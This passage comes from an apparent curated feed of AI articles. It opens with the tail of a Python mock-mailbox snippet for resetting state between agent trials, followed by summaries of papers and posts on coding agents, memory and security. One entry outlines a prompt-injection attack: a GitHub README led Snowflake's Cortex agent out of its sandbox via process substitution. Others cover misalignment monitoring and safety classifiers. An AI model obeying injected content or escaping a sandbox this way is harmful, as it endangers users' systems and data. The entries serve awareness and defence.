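class MockMailbox:
    """Toy stateful mock of an email service (illustrative only)."""

    def __init__(self):
        self.state = {"inbox": [], "sent": []}

    def receive(self, message):
        self.state["inbox"].append(message)

    def send(self, message):
        self.state["sent"].append(message)

    def delete_all(self):
        # The kind of irreversible action you would not test on a live account.
        self.state["inbox"].clear()

    def snapshot(self):
        # Deep copy so later mutations cannot leak into the saved state.
        return copy.deepcopy(self.state)

    def restore(self, snap):
        self.state = copy.deepcopy(snap)

mailbox = MockMailbox()
mailbox.receive({"from": "boss@example.com", "subject": "Q3 report"})
baseline = mailbox.snapshot()

mailbox.delete_all()            # agent takes a destructive action
damaged_count = len(mailbox.state["inbox"])

mailbox.restore(baseline)       # reset for the next trial
restored_count = len(mailbox.state["inbox"])
```

Restoring from the same snapshot before every trial means each run starts from an identical state, so differences in outcome can be attributed to the agent rather than to leftover state.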

from Apr 13, 2026 · via api-hf · arXiv:2604.05172

Intermediate

Type-Checked Compliance: Deterministic Guardrails for Agentic Financial Systems Using Lean 4 Theorem Proving

Devakh Rashie, Veda Rashi

security agents software-engineering

Financial services face an existential problem: probabilistic LLMs operating in domains requiring absolute compliance guarantees, and existing guardrails are fundamentally inadequate for complex regulatory constraints. This paper presents a breakthrough using Lean 4 theorem proving to treat every AI action as a mathematical conjecture—execution only proceeds if the system can formally prove regulatory compliance. While the approach targets financial services, the formal verification framework could revolutionize how we build deterministic guardrails for any high-stakes AI system.

Takeaways

Probabilistic guardrails are fundamentally inadequate for regulated industries that demand mathematical certainty of compliance.
Formal theorem proving can provide deterministic guarantees by treating every AI action as a provable mathematical conjecture.
Auto-formalizing policies into verifiable code bridges the gap between human regulations and machine-enforceable constraints.

from Apr 13, 2026 · 0 citations · via api-hf · arXiv:2604.01483

Intermediate

Components of A Coding Agent

agents software-engineering llms

Essential reading if you're architecting coding agents for production use. This breaks down the core components that make LLMs effective at code generation: sophisticated tool integration, persistent memory systems that maintain context across interactions, and repository-aware context management that helps models understand large codebases. The practical focus on how these pieces work together makes this invaluable for teams moving beyond simple code completion to full coding assistance.

Takeaways

Effective coding agents require sophisticated tool integration beyond simple code completion.
Memory systems that persist context across sessions are crucial for maintaining coherent development workflows.
Repository-aware context management enables agents to understand and work with large, complex codebases.

from Apr 13, 2026 · via manual

Advanced

Moonlake: Causal World Models should be Multimodal, Interactive, and Efficient — with Chris Manning and Fan-yun Sun

foundational agents reasoning

Stanford researchers discuss Moonlake, their approach to building causal world models that understand multimodal interactions and can efficiently reason about cause and effect in complex environments. This foundational research explores how AI systems can develop better understanding of how the world works, which is crucial for building more capable agents that can plan and reason about their actions.

Takeaways

Causal world models enable AI systems to understand cause-and-effect relationships rather than just correlations.
Multimodal approaches help models build more comprehensive understanding of how actions affect environments.
Efficient world models are essential for practical agent deployment in real-world scenarios.

from Apr 6, 2026 · via rss-latentspace

Intermediate

Vulnerability Research Is Cooked

security agents foundational opinion

Thomas Ptacek's analysis of how frontier models are fundamentally disrupting vulnerability research, arguing that AI agents will soon automate most exploit development work. He predicts this won't be gradual improvement but a sudden step-function change that transforms both the economics and practice of security research. Essential reading for understanding how AI is reshaping cybersecurity beyond just coding assistance.

Takeaways

Frontier AI models will automate vulnerability discovery by systematically analyzing codebases at scale.
The transformation will be sudden rather than gradual, fundamentally altering security research economics.
Most high-impact vulnerability research may soon require only pointing agents at source code rather than manual analysis.

from Apr 6, 2026 · via rss-willison

Intermediate

Show HN: Gemma Gem – AI model embedded in a browser – no API keys, no cloud

ikessler

agents llms software-engineering open-source

This Chrome extension demonstrates practical browser-based AI deployment by embedding Google's Gemma 4 model locally via WebGPU, complete with webpage interaction capabilities like clicking, typing, and JavaScript execution. It proves that sophisticated AI agents can run entirely client-side without API dependencies, opening new possibilities for privacy-preserving AI tools. The implementation shows how to build truly local AI agents with real-world utility.

Takeaways

WebGPU enables running 2B parameter models entirely in the browser without cloud dependencies.
Local AI agents can interact with web pages through tool calling while preserving user privacy.
Browser-based AI deployment eliminates API costs and latency while maintaining reasonable functionality.

from Apr 6, 2026 · 100 points on HN · via api-hn

Intermediate

The Design of AI Memory Systems

agents rag foundational

No detailed description is available for this entry because the source content could not be retrieved. The topic still matters: memory system design is central to production agents and RAG applications that need to maintain context and learn from interactions.

from Apr 6, 2026 · 7 points on Lobsters · via api-lobsters

Intermediate

Eight years of wanting, three months of building with AI

agents software-engineering how-we-work foundational

A compelling case study of how AI agents transformed an eight-year software vision into reality in just three months, specifically building comprehensive SQLite development tools. The author provides detailed insights into agentic engineering workflows and how AI can tackle complex, long-deferred projects that seemed too daunting for traditional development approaches. This demonstrates the paradigm shift from AI as a coding assistant to AI as a capable engineering partner.

Takeaways

AI agents can make previously intractable personal projects suddenly feasible by handling complex implementation details.
Agentic engineering workflows enable rapid prototyping of sophisticated developer tools that would take months using traditional methods.
The key to successful AI-assisted development is clearly defining goals while letting agents handle implementation complexity.

from Apr 6, 2026 · via rss-willison

Intermediate

Introducing the OpenAI Safety Bug Bounty program

security agents prompt-engineering

OpenAI's new bug bounty program specifically targets AI safety issues including prompt injection, agentic vulnerabilities, and data exfiltration — signaling that these attack vectors are now mainstream security concerns. For production teams, this validates that AI-specific security testing should be part of standard security practices, not an afterthought.

Takeaways

AI-specific vulnerabilities like prompt injection and agentic exploits are now recognized as legitimate security concerns requiring dedicated testing.
Production AI systems need security models that account for both traditional software vulnerabilities and novel AI attack vectors.

from Mar 29, 2026 · via rss-openai

Intermediate

Thoughts on slowing the fuck down

agents software-engineering opinion how-we-work

The creator of the Pi agent framework delivers a sharp critique of current AI-assisted development practices, arguing that the rush to generate code quickly is eroding engineering discipline and creating unsustainable technical debt. His core thesis: agent mistakes accumulate faster than human mistakes, making the 'move fast' approach particularly dangerous in AI-assisted development.

Takeaways

AI agents can generate technical debt faster than human developers, requiring new approaches to code quality control.
The velocity benefits of AI coding tools may come at the cost of long-term code maintainability and team understanding.
Engineering teams need intentional practices to maintain discipline when AI makes rapid development so tempting.

from Mar 29, 2026 · via rss-willison

Intermediate

Pi: The Minimal Agent Within OpenClaw

agents software-engineering how-we-work

Pi represents a minimalist approach to coding agents that focuses on doing fewer things extremely well rather than trying to be a general-purpose assistant. The author argues this constraint-driven design offers a glimpse into how production coding agents should be built — with clear boundaries and specific capabilities rather than attempting to solve every development task.

Takeaways

Minimalist agent design with clear constraints may be more effective than general-purpose coding assistants.
Focused agents that excel at specific tasks could be the future of AI-assisted development workflows.

from Mar 29, 2026 · via manual

Intermediate

Auto mode for Claude Code

agents security llms software-engineering

Anthropic introduces 'auto mode' for Claude Code that lets the AI make permission decisions autonomously, with a separate Claude model acting as a safety classifier before each action executes. This represents a sophisticated approach to the fundamental challenge of autonomous agents — how to give them freedom to act while maintaining safety guardrails through multi-model oversight.

Takeaways

Multi-model safety architectures can enable more autonomous agent behavior by having one model review another's planned actions.
Permission management in AI agents is evolving from binary allow/deny to context-aware decision making with built-in safeguards.
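
The review-before-execute pattern described above can be sketched in a few lines. This is a minimal sketch under stated assumptions, not Anthropic's implementation: `Action`, `keyword_classifier`, `run_with_review`, and `fake_execute` are hypothetical names, and the keyword check merely stands in for the second model that would act as the classifier.

```python
from dataclasses import dataclass
from typing import Callable


@dataclass
class Action:
    """A hypothetical planned tool call."""
    tool: str
    argument: str


# Hypothetical classifier signature: returns True when the action looks safe.
Classifier = Callable[[Action], bool]


def keyword_classifier(action: Action) -> bool:
    """Stand-in for the reviewing model; a real system would call a second LLM."""
    blocked = ("rm -rf", "curl", "sudo")
    return not any(marker in action.argument for marker in blocked)


def run_with_review(action: Action, classify: Classifier,
                    execute: Callable[[Action], str]) -> str:
    """Execute the action only if the classifier approves it first."""
    if not classify(action):
        return f"blocked: {action.tool} {action.argument!r}"
    return execute(action)


def fake_execute(action: Action) -> str:
    """Pretend executor so the sketch has no side effects."""
    return f"ran: {action.tool} {action.argument}"


safe = run_with_review(Action("bash", "ls -la"), keyword_classifier, fake_execute)
risky = run_with_review(Action("bash", "sudo rm -rf /"), keyword_classifier, fake_execute)
```

Keeping the classifier as a plain callable means the reviewing component can be swapped out without touching the execution path.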

from Mar 29, 2026 · via rss-willison

Accessible

Coding agents for data analysis

agents software-engineering how-we-work

Comprehensive workshop content demonstrating practical applications of coding agents for data analysis workflows. Covers real-world use cases like database querying, data exploration, and cleaning tasks using Claude Code and OpenAI Codex. Extremely valuable for engineers building data analysis pipelines with LLMs, providing concrete examples and methodologies rather than theoretical frameworks.

Takeaways

Coding agents excel at automating data analysis workflows including database querying, exploration, and cleaning tasks.
Claude Code and OpenAI Codex provide practical frameworks for building data analysis pipelines with concrete implementation examples.
Workshop-style learning with real use cases is more valuable than theoretical frameworks for implementing coding agents.

from Mar 23, 2026 · via rss-willison

Intermediate

An Agentic Multi-Agent Architecture for Cybersecurity Risk Management

Ravish Gupta

agents security how-we-work

Demonstrates a production-ready multi-agent architecture that cuts cybersecurity risk assessment costs from $15,000 to near-zero while maintaining 85% agreement with certified practitioners. The six-agent system uses persistent shared context to build comprehensive assessments in under 15 minutes. This is an excellent blueprint for building multi-agent systems that tackle expensive professional services.

Takeaways

A six-agent architecture reduced cybersecurity risk assessment costs from $15,000 to near-zero while maintaining 85% agreement with certified practitioners.
Multi-agent systems with persistent shared context can complete complex professional assessments in under 15 minutes.
This architecture provides a blueprint for replacing expensive professional services with coordinated AI agents.
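
To make "persistent shared context" concrete, here is a minimal sketch in which each agent reads from and writes to one shared dictionary. It uses three hypothetical agents rather than the paper's six, and the agent names, keys, and strings are invented for illustration; real agents would call a model instead of writing fixed text.

```python
from typing import Callable, Dict, List

# The shared context is a plain dict that every agent can read and extend.
SharedContext = Dict[str, str]
Agent = Callable[[SharedContext], None]


def asset_agent(ctx: SharedContext) -> None:
    """Hypothetical first stage: record what is being assessed."""
    ctx["assets"] = "customer database"


def threat_agent(ctx: SharedContext) -> None:
    """Hypothetical second stage: builds on what the asset agent wrote."""
    ctx["threats"] = f"unauthorized access to {ctx['assets']}"


def report_agent(ctx: SharedContext) -> None:
    """Hypothetical final stage: summarizes earlier findings."""
    ctx["report"] = f"Risk: {ctx['threats']}"


def run_pipeline(agents: List[Agent]) -> SharedContext:
    """Run the agents in order against one shared context and return it."""
    ctx: SharedContext = {}
    for agent in agents:
        agent(ctx)
    return ctx


result = run_pipeline([asset_agent, threat_agent, report_agent])
```

Because later agents depend on keys written by earlier ones, ordering matters in this sketch; a production system would need to validate that required keys exist before each stage runs.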

from Mar 23, 2026 · via api-arxiv · arXiv:2603.20131

Intermediate

Agentic Harness for Real-World Compilers

Yingwei Zheng

llms agents software-engineering

Introduces the first specialized agentic framework for fixing compiler bugs, addressing the massive performance drop (60%) that frontier models experience when tackling compiler issues versus regular software bugs. The llvm-autofix system outperforms state-of-the-art by 22% and provides compiler-specific tools that general coding agents lack. Essential if you're building AI systems for low-level systems programming.

Takeaways

Frontier models experience a 60% performance drop on compiler bugs versus regular software bugs, requiring specialized tooling.
The llvm-autofix system outperforms the state of the art by 22% through compiler-specific tools that general coding agents lack.
Building AI systems for specialized domains like systems programming requires domain-specific agentic frameworks.

from Mar 23, 2026 · 0 citations · via api-arxiv · arXiv:2603.20075

Accessible

Orchestrating Human-AI Software Delivery: A Retrospective Longitudinal Field Study of Three Software Modernization Programs

Maximiliano Armesto

software-engineering agents how-we-work

A rare longitudinal field study tracking real software modernization projects using human-AI collaboration across three major migrations. Shows concrete metrics: portfolio delivery time dropped from 36 project-weeks to 9.3, with modeled person-day savings of 73%. This provides actual evidence for AI productivity claims in enterprise software delivery, not just individual task benchmarks.

Takeaways

Real software modernization projects using human-AI collaboration reduced portfolio delivery time from 36 project-weeks to 9.3, with modeled person-day savings of 73%.
This provides concrete evidence for AI productivity claims in enterprise software delivery beyond individual task benchmarks.
Successful human-AI collaboration in software delivery requires orchestrated workflows, not just individual AI tool adoption.

from Mar 23, 2026 · via api-arxiv · arXiv:2603.20028

Intermediate

Snowflake Cortex AI Escapes Sandbox and Executes Malware

security agents

Essential reading if you're deploying AI agents in production environments. This PromptArmor report demonstrates a real prompt injection attack that escaped Snowflake's Cortex Agent sandbox by hiding malicious code in a GitHub README, then using process substitution to execute arbitrary commands. The attack vector shows how seemingly innocuous file operations can be weaponized, making this critical for understanding agent security boundaries.

Takeaways

Prompt injection attacks can escape AI agent sandboxes through seemingly harmless file operations, making thorough security boundaries critical for production deployments.
Malicious code hidden in external resources like GitHub READMEs can be weaponized through process substitution to execute arbitrary commands.
Agent security requires monitoring not just direct prompts but also all external content the agent processes.
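
One narrow, defensive reading of the point about process substitution: a command filter can at least flag the bash `<(...)` and `>(...)` forms before an agent runs a shell command. The sketch below is a heuristic under stated assumptions, not the mitigation from the report; the function name is hypothetical, and a regex check like this can both miss obfuscated variants and flag harmless quoted text.

```python
import re

# Matches the opening of bash process substitution: "<(" or ">(".
PROCESS_SUBSTITUTION = re.compile(r"[<>]\(")


def uses_process_substitution(command: str) -> bool:
    """Return True if the command string contains "<(" or ">("."""
    return PROCESS_SUBSTITUTION.search(command) is not None


flagged = uses_process_substitution("cat <(curl http://example.invalid/x.sh)")
plain = uses_process_substitution("cat README.md")
```

A check like this belongs alongside, not instead of, sandboxing and allowlists, since string matching alone cannot establish that a command is safe.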

from Mar 23, 2026 · via rss-willison

Intermediate

Memori: A Persistent Memory Layer for Efficient, Context-Aware LLM Agents

Luiz C. Borro

agents llms software-engineering

Solves the expensive memory problem plaguing production LLM agents by treating memory as a data structuring challenge rather than dumping raw conversations into context. Memori converts dialogue into semantic triples and summaries, achieving 81% accuracy while using only 5% of full context tokens — resulting in 67% cost reduction over competing approaches. This is exactly what you need if you're building agents that need to remember across sessions without breaking the bank.

Takeaways

Converting dialogue to semantic triples and summaries can cut context token usage by 95% while maintaining 81% accuracy in agent conversations.
Treating agent memory as a data structuring problem rather than raw context dumping achieves 67% cost reduction over competing approaches.
Persistent memory for production agents requires semantic compression techniques to scale economically.
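
The idea of storing memory as semantic triples instead of raw transcripts can be sketched as follows. This is an illustrative sketch, not Memori's API: `Triple` and `TripleMemory` are hypothetical names, and the triples are written by hand here, whereas a real system would extract them from dialogue with a model.

```python
from collections import defaultdict
from typing import Dict, List, NamedTuple


class Triple(NamedTuple):
    """A (subject, predicate, object) fact distilled from a conversation."""
    subject: str
    predicate: str
    obj: str


class TripleMemory:
    """Hypothetical in-memory store that indexes triples by subject."""

    def __init__(self) -> None:
        self._by_subject: Dict[str, List[Triple]] = defaultdict(list)

    def add(self, triple: Triple) -> None:
        self._by_subject[triple.subject].append(triple)

    def recall(self, subject: str) -> List[str]:
        """Return compact one-line facts to place in the prompt."""
        return [" ".join(t) for t in self._by_subject.get(subject, [])]


memory = TripleMemory()
memory.add(Triple("user", "prefers", "Python"))
memory.add(Triple("user", "works_at", "Acme"))
memory.add(Triple("project", "uses", "SQLite"))

context_lines = memory.recall("user")
```

Only the few recalled lines go into the prompt, which is where the token savings come from compared with replaying the full conversation.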

from Mar 23, 2026 · via api-arxiv · arXiv:2603.19935

Intermediate

How we monitor internal coding agents for misalignment

security agents evaluations software-engineering

OpenAI reveals their internal methodology for monitoring coding agents for misalignment in real production deployments. This isn't theoretical safety research — it's practical guidance on detecting when your coding agents start exhibiting dangerous behaviors. Critical reading for any team deploying AI coding assistants, as it provides concrete monitoring techniques and risk detection strategies.

Takeaways

OpenAI's internal monitoring for coding agent misalignment focuses on detecting dangerous behaviors in real production deployments rather than theoretical safety.
Concrete monitoring techniques and risk detection strategies are essential for any team deploying AI coding assistants in production.
Misalignment monitoring should be built into coding agent deployment pipelines from day one.

from Mar 23, 2026 · via rss-openai